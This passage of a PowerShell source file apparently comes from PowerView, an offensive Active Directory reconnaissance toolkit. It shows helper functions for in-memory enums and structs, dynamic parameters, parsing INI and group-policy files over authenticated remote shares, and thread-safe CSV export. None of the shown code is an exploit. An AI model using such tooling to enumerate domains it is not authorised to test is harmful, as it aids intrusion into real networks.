{\n<#\n.SYNOPSIS\n\nCreates an in-memory enumeration for use in your PowerShell session.\n\nAuthor: Matthew Graeber (@mattifestation)\nLicense: BSD 3-Clause\nRequired Dependencies: None\nOptional Dependencies: None\n\n.DESCRIPTION\n\nThe 'psenum' function facilitates the creation of enums entirely in\nmemory using as close to a \"C style\" as PowerShell will allow.\n\n.PARAMETER Module\n\nThe in-memory module that will host the enum. Use\nNew-InMemoryModule to define an in-memory module.\n\n.PARAMETER FullName\n\nThe fully-qualified name of the enum.\n\n.PARAMETER Type\n\nThe type of each enum element.\n\n.PARAMETER EnumElements\n\nA hashtable of enum elements.\n\n.PARAMETER Bitfield\n\nSpecifies that the enum should be treated as a bitfield.\n\n.EXAMPLE\n\n$Mod = New-InMemoryModule -ModuleName Win32\n\n$ImageSubsystem = psenum $Mod PE.IMAGE_SUBSYSTEM UInt16 @{\n    UNKNOWN =                  0\n    NATIVE =                   1 # Image doesn't require a subsystem.\n    WINDOWS_GUI =              2 # Image runs in the Windows GUI subsystem.\n    WINDOWS_CUI =              3 # Image runs in the Windows character subsystem.\n    OS2_CUI =                  5 # Image runs in the OS/2 character subsystem.\n    POSIX_CUI =                7 # Image runs in the Posix character subsystem.\n    NATIVE_WINDOWS =           8 # Image is a native Win9x driver.\n    WINDOWS_CE_GUI =           9 # Image runs in the Windows CE subsystem.\n    EFI_APPLICATION =          10\n    EFI_BOOT_SERVICE_DRIVER =  11\n    EFI_RUNTIME_DRIVER =       12\n    EFI_ROM =                  13\n    XBOX =                     14\n    WINDOWS_BOOT_APPLICATION = 16\n}\n\n.NOTES\n\nPowerShell purists may disagree with the naming of this function but\nagain, this was developed in such a way so as to emulate a \"C style\"\ndefinition as closely as possible. Sorry, I'm not going to name it\nNew-Enum. :P\n#>\n\n    [OutputType([Type])]\n    Param (\n        [Parameter(Position = 0, Mandatory=$True)]\n        [ValidateScript({($_ -is [Reflection.Emit.ModuleBuilder]) -or ($_ -is [Reflection.Assembly])})]\n        $Module,\n\n        [Parameter(Position = 1, Mandatory=$True)]\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $FullName,\n\n        [Parameter(Position = 2, Mandatory=$True)]\n        [Type]\n        $Type,\n\n        [Parameter(Position = 3, Mandatory=$True)]\n        [ValidateNotNullOrEmpty()]\n        [Hashtable]\n        $EnumElements,\n\n        [Switch]\n        $Bitfield\n    )\n\n    if ($Module -is [Reflection.Assembly])\n    {\n        return ($Module.GetType($FullName))\n    }\n\n    $EnumType = $Type -as [Type]\n\n    $EnumBuilder = $Module.DefineEnum($FullName, 'Public', $EnumType)\n\n    if ($Bitfield)\n    {\n        $FlagsConstructor = [FlagsAttribute].GetConstructor(@())\n        $FlagsCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($FlagsConstructor, @())\n        $EnumBuilder.SetCustomAttribute($FlagsCustomAttribute)\n    }\n\n    foreach ($Key in $EnumElements.Keys)\n    {\n        # Apply the specified enum type to each element\n        $null = $EnumBuilder.DefineLiteral($Key, $EnumElements[$Key] -as $EnumType)\n    }\n\n    $EnumBuilder.CreateType()\n}\n\n\n# A helper function used to reduce typing while defining struct\n# fields.\nfunction field {\n    Param (\n        [Parameter(Position = 0, Mandatory=$True)]\n        [UInt16]\n        $Position,\n\n        [Parameter(Position = 1, Mandatory=$True)]\n        [Type]\n        $Type,\n\n        [Parameter(Position = 2)]\n        [UInt16]\n        $Offset,\n\n        [Object[]]\n        $MarshalAs\n    )\n\n    @{\n        Position = $Position\n        Type = $Type -as [Type]\n        Offset = $Offset\n        MarshalAs = $MarshalAs\n    }\n}\n\n\nfunction struct\n{\n<#\n.SYNOPSIS\n\nCreates an in-memory struct for use in your PowerShell session.\n\nAuthor: Matthew Graeber (@mattifestation)\nLicense: BSD 3-Clause\nRequired Dependencies: None\nOptional Dependencies: field\n\n.DESCRIPTION\n\nThe 'struct' function facilitates the creation of structs entirely in\nmemory using as close to a \"C style\" as PowerShell will allow. Struct\nfields are specified using a hashtable where each field of the struct\nis comprosed of the order in which it should be defined, its .NET\ntype, and optionally, its offset and special marshaling attributes.\n\nOne of the features of 'struct' is that after your struct is defined,\nit will come with a built-in GetSize method as well as an explicit\nconverter so that you can easily cast an IntPtr to the struct without\nrelying upon calling SizeOf and/or PtrToStructure in the Marshal\nclass.\n\n.PARAMETER Module\n\nThe in-memory module that will host the struct. Use\nNew-InMemoryModule to define an in-memory module.\n\n.PARAMETER FullName\n\nThe fully-qualified name of the struct.\n\n.PARAMETER StructFields\n\nA hashtable of fields. Use the 'field' helper function to ease\ndefining each field.\n\n.PARAMETER PackingSize\n\nSpecifies the memory alignment of fields.\n\n.PARAMETER ExplicitLayout\n\nIndicates that an explicit offset for each field will be specified.\n\n.EXAMPLE\n\n$Mod = New-InMemoryModule -ModuleName Win32\n\n$ImageDosSignature = psenum $Mod PE.IMAGE_DOS_SIGNATURE UInt16 @{\n    DOS_SIGNATURE =    0x5A4D\n    OS2_SIGNATURE =    0x454E\n    OS2_SIGNATURE_LE = 0x454C\n    VXD_SIGNATURE =    0x454C\n}\n\n$ImageDosHeader = struct $Mod PE.IMAGE_DOS_HEADER @{\n    e_magic =    field 0 $ImageDosSignature\n    e_cblp =     field 1 UInt16\n    e_cp =       field 2 UInt16\n    e_crlc =     field 3 UInt16\n    e_cparhdr =  field 4 UInt16\n    e_minalloc = field 5 UInt16\n    e_maxalloc = field 6 UInt16\n    e_ss =       field 7 UInt16\n    e_sp =       field 8 UInt16\n    e_csum =     field 9 UInt16\n    e_ip =       field 10 UInt16\n    e_cs =       field 11 UInt16\n    e_lfarlc =   field 12 UInt16\n    e_ovno =     field 13 UInt16\n    e_res =      field 14 UInt16[] -MarshalAs @('ByValArray', 4)\n    e_oemid =    field 15 UInt16\n    e_oeminfo =  field 16 UInt16\n    e_res2 =     field 17 UInt16[] -MarshalAs @('ByValArray', 10)\n    e_lfanew =   field 18 Int32\n}\n\n# Example of using an explicit layout in order to create a union.\n$TestUnion = struct $Mod TestUnion @{\n    field1 = field 0 UInt32 0\n    field2 = field 1 IntPtr 0\n} -ExplicitLayout\n\n.NOTES\n\nPowerShell purists may disagree with the naming of this function but\nagain, this was developed in such a way so as to emulate a \"C style\"\ndefinition as closely as possible. Sorry, I'm not going to name it\nNew-Struct. :P\n#>\n\n    [OutputType([Type])]\n    Param (\n        [Parameter(Position = 1, Mandatory=$True)]\n        [ValidateScript({($_ -is [Reflection.Emit.ModuleBuilder]) -or ($_ -is [Reflection.Assembly])})]\n        $Module,\n\n        [Parameter(Position = 2, Mandatory=$True)]\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $FullName,\n\n        [Parameter(Position = 3, Mandatory=$True)]\n        [ValidateNotNullOrEmpty()]\n        [Hashtable]\n        $StructFields,\n\n        [Reflection.Emit.PackingSize]\n        $PackingSize = [Reflection.Emit.PackingSize]::Unspecified,\n\n        [Switch]\n        $ExplicitLayout\n    )\n\n    if ($Module -is [Reflection.Assembly])\n    {\n        return ($Module.GetType($FullName))\n    }\n\n    [Reflection.TypeAttributes] $StructAttributes = 'AnsiClass,\n        Class,\n        Public,\n        Sealed,\n        BeforeFieldInit'\n\n    if ($ExplicitLayout)\n    {\n        $StructAttributes = $StructAttributes -bor [Reflection.TypeAttributes]::ExplicitLayout\n    }\n    else\n    {\n        $StructAttributes = $StructAttributes -bor [Reflection.TypeAttributes]::SequentialLayout\n    }\n\n    $StructBuilder = $Module.DefineType($FullName, $StructAttributes, [ValueType], $PackingSize)\n    $ConstructorInfo = [Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0]\n    $SizeConst = @([Runtime.InteropServices.MarshalAsAttribute].GetField('SizeConst'))\n\n    $Fields = New-Object Hashtable[]($StructFields.Count)\n\n    # Sort each field according to the orders specified\n    # Unfortunately, PSv2 doesn't have the luxury of the\n    # hashtable [Ordered] accelerator.\n    foreach ($Field in $StructFields.Keys)\n    {\n        $Index = $StructFields[$Field]['Position']\n        $Fields[$Index] = @{FieldName = $Field; Properties = $StructFields[$Field]}\n    }\n\n    foreach ($Field in $Fields)\n    {\n        $FieldName = $Field['FieldName']\n        $FieldProp = $Field['Properties']\n\n        $Offset = $FieldProp['Offset']\n        $Type = $FieldProp['Type']\n        $MarshalAs = $FieldProp['MarshalAs']\n\n        $NewField = $StructBuilder.DefineField($FieldName, $Type, 'Public')\n\n        if ($MarshalAs)\n        {\n            $UnmanagedType = $MarshalAs[0] -as ([Runtime.InteropServices.UnmanagedType])\n            if ($MarshalAs[1])\n            {\n                $Size = $MarshalAs[1]\n                $AttribBuilder = New-Object Reflection.Emit.CustomAttributeBuilder($ConstructorInfo,\n                    $UnmanagedType, $SizeConst, @($Size))\n            }\n            else\n            {\n                $AttribBuilder = New-Object Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, [Object[]] @($UnmanagedType))\n            }\n\n            $NewField.SetCustomAttribute($AttribBuilder)\n        }\n\n        if ($ExplicitLayout) { $NewField.SetOffset($Offset) }\n    }\n\n    # Make the struct aware of its own size.\n    # No more having to call [Runtime.InteropServices.Marshal]::SizeOf!\n    $SizeMethod = $StructBuilder.DefineMethod('GetSize',\n        'Public, Static',\n        [Int],\n        [Type[]] @())\n    $ILGenerator = $SizeMethod.GetILGenerator()\n    # Thanks for the help, Jason Shirk!\n    $ILGenerator.Emit([Reflection.Emit.OpCodes]::Ldtoken, $StructBuilder)\n    $ILGenerator.Emit([Reflection.Emit.OpCodes]::Call,\n        [Type].GetMethod('GetTypeFromHandle'))\n    $ILGenerator.Emit([Reflection.Emit.OpCodes]::Call,\n        [Runtime.InteropServices.Marshal].GetMethod('SizeOf', [Type[]] @([Type])))\n    $ILGenerator.Emit([Reflection.Emit.OpCodes]::Ret)\n\n    # Allow for explicit casting from an IntPtr\n    # No more having to call [Runtime.InteropServices.Marshal]::PtrToStructure!\n    $ImplicitConverter = $StructBuilder.DefineMethod('op_Implicit',\n        'PrivateScope, Public, Static, HideBySig, SpecialName',\n        $StructBuilder,\n        [Type[]] @([IntPtr]))\n    $ILGenerator2 = $ImplicitConverter.GetILGenerator()\n    $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Nop)\n    $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Ldarg_0)\n    $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Ldtoken, $StructBuilder)\n    $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Call,\n        [Type].GetMethod('GetTypeFromHandle'))\n    $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Call,\n        [Runtime.InteropServices.Marshal].GetMethod('PtrToStructure', [Type[]] @([IntPtr], [Type])))\n    $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Unbox_Any, $StructBuilder)\n    $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Ret)\n\n    $StructBuilder.CreateType()\n}\n\n\n########################################################\n#\n# Misc. helpers\n#\n########################################################\n\nFunction New-DynamicParameter {\n<#\n.SYNOPSIS\n\nHelper function to simplify creating dynamic parameters.\n\n    Adapated from https://beatcracker.wordpress.com/2015/08/10/dynamic-parameters-validateset-and-enums/.\n    Originally released under the Microsoft Public License (Ms-PL).\n\n.DESCRIPTION\n\nHelper function to simplify creating dynamic parameters.\n\nExample use cases:\n    Include parameters only if your environment dictates it\n    Include parameters depending on the value of a user-specified parameter\n    Provide tab completion and intellisense for parameters, depending on the environment\n\nPlease keep in mind that all dynamic parameters you create, will not have corresponding variables created.\n    Use New-DynamicParameter with 'CreateVariables' switch in your main code block,\n    ('Process' for advanced functions) to create those variables.\n    Alternatively, manually reference $PSBoundParameters for the dynamic parameter value.\n\nThis function has two operating modes:\n\n1. All dynamic parameters created in one pass using pipeline input to the function. This mode allows to create dynamic parameters en masse,\nwith one function call. There is no need to create and maintain custom RuntimeDefinedParameterDictionary.\n\n2. Dynamic parameters are created by separate function calls and added to the RuntimeDefinedParameterDictionary you created beforehand.\nThen you output this RuntimeDefinedParameterDictionary to the pipeline. This allows more fine-grained control of the dynamic parameters,\nwith custom conditions and so on.\n\n.NOTES\n\nCredits to jrich523 and ramblingcookiemonster for their initial code and inspiration:\n    https://github.com/RamblingCookieMonster/PowerShell/blob/master/New-DynamicParam.ps1\n    http://ramblingcookiemonster.wordpress.com/2014/11/27/quick-hits-credentials-and-dynamic-parameters/\n    http://jrich523.wordpress.com/2013/05/30/powershell-simple-way-to-add-dynamic-parameters-to-advanced-function/\n\nCredit to BM for alias and type parameters and their handling\n\n.PARAMETER Name\n\nName of the dynamic parameter\n\n.PARAMETER Type\n\nType for the dynamic parameter.  Default is string\n\n.PARAMETER Alias\n\nIf specified, one or more aliases to assign to the dynamic parameter\n\n.PARAMETER Mandatory\n\nIf specified, set the Mandatory attribute for this dynamic parameter\n\n.PARAMETER Position\n\nIf specified, set the Position attribute for this dynamic parameter\n\n.PARAMETER HelpMessage\n\nIf specified, set the HelpMessage for this dynamic parameter\n\n.PARAMETER DontShow\n\nIf specified, set the DontShow for this dynamic parameter.\nThis is the new PowerShell 4.0 attribute that hides parameter from tab-completion.\nhttp://www.powershellmagazine.com/2013/07/29/pstip-hiding-parameters-from-tab-completion/\n\n.PARAMETER ValueFromPipeline\n\nIf specified, set the ValueFromPipeline attribute for this dynamic parameter\n\n.PARAMETER ValueFromPipelineByPropertyName\n\nIf specified, set the ValueFromPipelineByPropertyName attribute for this dynamic parameter\n\n.PARAMETER ValueFromRemainingArguments\n\nIf specified, set the ValueFromRemainingArguments attribute for this dynamic parameter\n\n.PARAMETER ParameterSetName\n\nIf specified, set the ParameterSet attribute for this dynamic parameter. By default parameter is added to all parameters sets.\n\n.PARAMETER AllowNull\n\nIf specified, set the AllowNull attribute of this dynamic parameter\n\n.PARAMETER AllowEmptyString\n\nIf specified, set the AllowEmptyString attribute of this dynamic parameter\n\n.PARAMETER AllowEmptyCollection\n\nIf specified, set the AllowEmptyCollection attribute of this dynamic parameter\n\n.PARAMETER ValidateNotNull\n\nIf specified, set the ValidateNotNull attribute of this dynamic parameter\n\n.PARAMETER ValidateNotNullOrEmpty\n\nIf specified, set the ValidateNotNullOrEmpty attribute of this dynamic parameter\n\n.PARAMETER ValidateRange\n\nIf specified, set the ValidateRange attribute of this dynamic parameter\n\n.PARAMETER ValidateLength\n\nIf specified, set the ValidateLength attribute of this dynamic parameter\n\n.PARAMETER ValidatePattern\n\nIf specified, set the ValidatePattern attribute of this dynamic parameter\n\n.PARAMETER ValidateScript\n\nIf specified, set the ValidateScript attribute of this dynamic parameter\n\n.PARAMETER ValidateSet\n\nIf specified, set the ValidateSet attribute of this dynamic parameter\n\n.PARAMETER Dictionary\n\nIf specified, add resulting RuntimeDefinedParameter to an existing RuntimeDefinedParameterDictionary.\nAppropriate for custom dynamic parameters creation.\n\nIf not specified, create and return a RuntimeDefinedParameterDictionary\nAppropriate for a simple dynamic parameter creation.\n#>\n\n    [CmdletBinding(DefaultParameterSetName = 'DynamicParameter')]\n    Param (\n        [Parameter(Mandatory = $true, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]\n        [ValidateNotNullOrEmpty()]\n        [string]$Name,\n\n        [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]\n        [System.Type]$Type = [int],\n\n        [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]\n        [string[]]$Alias,\n\n        [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]\n        [switch]$Mandatory,\n\n        [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]\n        [int]$Position,\n\n        [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]\n        [string]$HelpMessage,\n\n        [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]\n        [switch]$DontShow,\n\n        [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]\n        [switch]$ValueFromPipeline,\n\n        [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]\n        [switch]$ValueFromPipelineByPropertyName,\n\n        [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]\n        [switch]$ValueFromRemainingArguments,\n\n        [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]\n        [string]$ParameterSetName = '__AllParameterSets',\n\n        [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]\n        [switch]$AllowNull,\n\n        [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]\n        [switch]$AllowEmptyString,\n\n        [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]\n        [switch]$AllowEmptyCollection,\n\n        [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]\n        [switch]$ValidateNotNull,\n\n        [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]\n        [switch]$ValidateNotNullOrEmpty,\n\n        [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]\n        [ValidateCount(2,2)]\n        [int[]]$ValidateCount,\n\n        [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]\n        [ValidateCount(2,2)]\n        [int[]]$ValidateRange,\n\n        [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]\n        [ValidateCount(2,2)]\n        [int[]]$ValidateLength,\n\n        [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]\n        [ValidateNotNullOrEmpty()]\n        [string]$ValidatePattern,\n\n        [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]\n        [ValidateNotNullOrEmpty()]\n        [scriptblock]$ValidateScript,\n\n        [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]\n        [ValidateNotNullOrEmpty()]\n        [string[]]$ValidateSet,\n\n        [Parameter(ValueFromPipelineByPropertyName = $true, ParameterSetName = 'DynamicParameter')]\n        [ValidateNotNullOrEmpty()]\n        [ValidateScript({\n            if(!($_ -is [System.Management.Automation.RuntimeDefinedParameterDictionary]))\n            {\n                Throw 'Dictionary must be a System.Management.Automation.RuntimeDefinedParameterDictionary object'\n            }\n            $true\n        })]\n        $Dictionary = $false,\n\n        [Parameter(Mandatory = $true, ValueFromPipelineByPropertyName = $true, ParameterSetName = 'CreateVariables')]\n        [switch]$CreateVariables,\n\n        [Parameter(Mandatory = $true, ValueFromPipelineByPropertyName = $true, ParameterSetName = 'CreateVariables')]\n        [ValidateNotNullOrEmpty()]\n        [ValidateScript({\n            # System.Management.Automation.PSBoundParametersDictionary is an internal sealed class,\n            # so one can't use PowerShell's '-is' operator to validate type.\n            if($_.GetType().Name -notmatch 'Dictionary') {\n                Throw 'BoundParameters must be a System.Management.Automation.PSBoundParametersDictionary object'\n            }\n            $true\n        })]\n        $BoundParameters\n    )\n\n    Begin {\n        $InternalDictionary = New-Object -TypeName System.Management.Automation.RuntimeDefinedParameterDictionary\n        function _temp { [CmdletBinding()] Param() }\n        $CommonParameters = (Get-Command _temp).Parameters.Keys\n    }\n\n    Process {\n        if($CreateVariables) {\n            $BoundKeys = $BoundParameters.Keys | Where-Object { $CommonParameters -notcontains $_ }\n            ForEach($Parameter in $BoundKeys) {\n                if ($Parameter) {\n                    Set-Variable -Name $Parameter -Value $BoundParameters.$Parameter -Scope 1 -Force\n                }\n            }\n        }\n        else {\n            $StaleKeys = @()\n            $StaleKeys = $PSBoundParameters.GetEnumerator() |\n                        ForEach-Object {\n                            if($_.Value.PSobject.Methods.Name -match '^Equals$') {\n                                # If object has Equals, compare bound key and variable using it\n                                if(!$_.Value.Equals((Get-Variable -Name $_.Key -ValueOnly -Scope 0))) {\n                                    $_.Key\n                                }\n                            }\n                            else {\n                                # If object doesn't has Equals (e.g. $null), fallback to the PowerShell's -ne operator\n                                if($_.Value -ne (Get-Variable -Name $_.Key -ValueOnly -Scope 0)) {\n                                    $_.Key\n                                }\n                            }\n                        }\n            if($StaleKeys) {\n                $StaleKeys | ForEach-Object {[void]$PSBoundParameters.Remove($_)}\n            }\n\n            # Since we rely solely on $PSBoundParameters, we don't have access to default values for unbound parameters\n            $UnboundParameters = (Get-Command -Name ($PSCmdlet.MyInvocation.InvocationName)).Parameters.GetEnumerator()  |\n                                        # Find parameters that are belong to the current parameter set\n                                        Where-Object { $_.Value.ParameterSets.Keys -contains $PsCmdlet.ParameterSetName } |\n                                            Select-Object -ExpandProperty Key |\n                                                # Find unbound parameters in the current parameter set\n                                                Where-Object { $PSBoundParameters.Keys -notcontains $_ }\n\n            # Even if parameter is not bound, corresponding variable is created with parameter's default value (if specified)\n            $tmp = $null\n            ForEach ($Parameter in $UnboundParameters) {\n                $DefaultValue = Get-Variable -Name $Parameter -ValueOnly -Scope 0\n                if(!$PSBoundParameters.TryGetValue($Parameter, [ref]$tmp) -and $DefaultValue) {\n                    $PSBoundParameters.$Parameter = $DefaultValue\n                }\n            }\n\n            if($Dictionary) {\n                $DPDictionary = $Dictionary\n            }\n            else {\n                $DPDictionary = $InternalDictionary\n            }\n\n            # Shortcut for getting local variables\n            $GetVar = {Get-Variable -Name $_ -ValueOnly -Scope 0}\n\n            # Strings to match attributes and validation arguments\n            $AttributeRegex = '^(Mandatory|Position|ParameterSetName|DontShow|HelpMessage|ValueFromPipeline|ValueFromPipelineByPropertyName|ValueFromRemainingArguments)$'\n            $ValidationRegex = '^(AllowNull|AllowEmptyString|AllowEmptyCollection|ValidateCount|ValidateLength|ValidatePattern|ValidateRange|ValidateScript|ValidateSet|ValidateNotNull|ValidateNotNullOrEmpty)$'\n            $AliasRegex = '^Alias$'\n            $ParameterAttribute = New-Object -TypeName System.Management.Automation.ParameterAttribute\n\n            switch -regex ($PSBoundParameters.Keys) {\n                $AttributeRegex {\n                    Try {\n                        $ParameterAttribute.$_ = . $GetVar\n                    }\n                    Catch {\n                        $_\n                    }\n                    continue\n                }\n            }\n\n            if($DPDictionary.Keys -contains $Name) {\n                $DPDictionary.$Name.Attributes.Add($ParameterAttribute)\n            }\n            else {\n                $AttributeCollection = New-Object -TypeName Collections.ObjectModel.Collection[System.Attribute]\n                switch -regex ($PSBoundParameters.Keys) {\n                    $ValidationRegex {\n                        Try {\n                            $ParameterOptions = New-Object -TypeName \"System.Management.Automation.${_}Attribute\" -ArgumentList (. $GetVar) -ErrorAction Stop\n                            $AttributeCollection.Add($ParameterOptions)\n                        }\n                        Catch { $_ }\n                        continue\n                    }\n                    $AliasRegex {\n                        Try {\n                            $ParameterAlias = New-Object -TypeName System.Management.Automation.AliasAttribute -ArgumentList (. $GetVar) -ErrorAction Stop\n                            $AttributeCollection.Add($ParameterAlias)\n                            continue\n                        }\n                        Catch { $_ }\n                    }\n                }\n                $AttributeCollection.Add($ParameterAttribute)\n                $Parameter = New-Object -TypeName System.Management.Automation.RuntimeDefinedParameter -ArgumentList @($Name, $Type, $AttributeCollection)\n                $DPDictionary.Add($Name, $Parameter)\n            }\n        }\n    }\n\n    End {\n        if(!$CreateVariables -and !$Dictionary) {\n            $DPDictionary\n        }\n    }\n}\n\n\nfunction Get-IniContent {\n<#\n.SYNOPSIS\n\nThis helper parses an .ini file into a hashtable.\n\nAuthor: 'The Scripting Guys'\nModifications: @harmj0y (-Credential support)\nLicense: BSD 3-Clause\nRequired Dependencies: Add-RemoteConnection, Remove-RemoteConnection\n\n.DESCRIPTION\n\nParses an .ini file into a hashtable. If -Credential is supplied,\nthen Add-RemoteConnection is used to map \\\\COMPUTERNAME\\IPC$, the file\nis parsed, and then the connection is destroyed with Remove-RemoteConnection.\n\n.PARAMETER Path\n\nSpecifies the path to the .ini file to parse.\n\n.PARAMETER OutputObject\n\nSwitch. Output a custom PSObject instead of a hashtable.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the remote system.\n\n.EXAMPLE\n\nGet-IniContent C:\\Windows\\example.ini\n\n.EXAMPLE\n\n\"C:\\Windows\\example.ini\" | Get-IniContent -OutputObject\n\nOutputs the .ini details as a proper nested PSObject.\n\n.EXAMPLE\n\n\"C:\\Windows\\example.ini\" | Get-IniContent\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nGet-IniContent -Path \\\\PRIMARY.testlab.local\\C$\\Temp\\GptTmpl.inf -Credential $Cred\n\n.INPUTS\n\nString\n\nAccepts one or more .ini paths on the pipeline.\n\n.OUTPUTS\n\nHashtable\n\nOuputs a hashtable representing the parsed .ini file.\n\n.LINK\n\nhttps://blogs.technet.microsoft.com/heyscriptingguy/2011/08/20/use-powershell-to-work-with-any-ini-file/\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType([Hashtable])]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('FullName', 'Name')]\n        [ValidateNotNullOrEmpty()]\n        [String[]]\n        $Path,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty,\n\n        [Switch]\n        $OutputObject\n    )\n\n    BEGIN {\n        $MappedComputers = @{}\n    }\n\n    PROCESS {\n        ForEach ($TargetPath in $Path) {\n            if (($TargetPath -Match '\\\\\\\\.*\\\\.*') -and ($PSBoundParameters['Credential'])) {\n                $HostComputer = (New-Object System.Uri($TargetPath)).Host\n                if (-not $MappedComputers[$HostComputer]) {\n                    # map IPC$ to this computer if it's not already\n                    Add-RemoteConnection -ComputerName $HostComputer -Credential $Credential\n                    $MappedComputers[$HostComputer] = $True\n                }\n            }\n\n            if (Test-Path -Path $TargetPath) {\n                if ($PSBoundParameters['OutputObject']) {\n                    $IniObject = New-Object PSObject\n                }\n                else {\n                    $IniObject = @{}\n                }\n                Switch -Regex -File $TargetPath {\n                    \"^\\[(.+)\\]\" # Section\n                    {\n                        $Section = $matches[1].Trim()\n                        if ($PSBoundParameters['OutputObject']) {\n                            $Section = $Section.Replace(' ', '')\n                            $SectionObject = New-Object PSObject\n                            $IniObject | Add-Member Noteproperty $Section $SectionObject\n                        }\n                        else {\n                            $IniObject[$Section] = @{}\n                        }\n                        $CommentCount = 0\n                    }\n                    \"^(;.*)$\" # Comment\n                    {\n                        $Value = $matches[1].Trim()\n                        $CommentCount = $CommentCount + 1\n                        $Name = 'Comment' + $CommentCount\n                        if ($PSBoundParameters['OutputObject']) {\n                            $Name = $Name.Replace(' ', '')\n                            $IniObject.$Section | Add-Member Noteproperty $Name $Value\n                        }\n                        else {\n                            $IniObject[$Section][$Name] = $Value\n                        }\n                    }\n                    \"(.+?)\\s*=(.*)\" # Key\n                    {\n                        $Name, $Value = $matches[1..2]\n                        $Name = $Name.Trim()\n                        $Values = $Value.split(',') | ForEach-Object { $_.Trim() }\n\n                        # if ($Values -isnot [System.Array]) { $Values = @($Values) }\n\n                        if ($PSBoundParameters['OutputObject']) {\n                            $Name = $Name.Replace(' ', '')\n                            $IniObject.$Section | Add-Member Noteproperty $Name $Values\n                        }\n                        else {\n                            $IniObject[$Section][$Name] = $Values\n                        }\n                    }\n                }\n                $IniObject\n            }\n        }\n    }\n\n    END {\n        # remove the IPC$ mappings\n        $MappedComputers.Keys | Remove-RemoteConnection\n    }\n}\n\n\nfunction Export-PowerViewCSV {\n<#\n.SYNOPSIS\n\nConverts objects into a series of comma-separated (CSV) strings and saves the\nstrings in a CSV file in a thread-safe manner.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: None  \n\n.DESCRIPTION\n\nThis helper exports an -InputObject to a .csv in a thread-safe manner\nusing a mutex. This is so the various multi-threaded functions in\nPowerView has a thread-safe way to export output to the same file.\nUses .NET IO.FileStream/IO.StreamWriter objects for speed.\n\nOriginally based on Dmitry Sotnikov's Export-CSV code: http://poshcode.org/1590\n\n.PARAMETER InputObject\n\nSpecifies the objects to export as CSV strings.\n\n.PARAMETER Path\n\nSpecifies the path to the CSV output file.\n\n.PARAMETER Delimiter\n\nSpecifies a delimiter to separate the property values. The default is a comma (,)\n\n.PARAMETER Append\n\nIndicates that this cmdlet adds the CSV output to the end of the specified file.\nWithout this parameter, Export-PowerViewCSV replaces the file contents without warning.\n\n.EXAMPLE\n\nGet-DomainUser | Export-PowerViewCSV -Path \"users.csv\"\n\n.EXAMPLE\n\nGet-DomainUser | Export-PowerViewCSV -Path \"users.csv\" -Append -Delimiter '|'\n\n.INPUTS\n\nPSObject\n\nAccepts one or more PSObjects on the pipeline.\n\n.LINK\n\nhttp://poshcode.org/1590\nhttp://dmitrysotnikov.wordpress.com/2010/01/19/Export-Csv-append/\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [System.Management.Automation.PSObject[]]\n        $InputObject,\n\n        [Parameter(Mandatory = $True, Position = 1)]\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Path,\n\n        [Parameter(Position = 2)]\n        [ValidateNotNullOrEmpty()]\n        [Char]\n        $Delimiter = ',',\n\n        [Switch]\n        $Append\n    )\n\n    BEGIN {\n        $OutputPath = 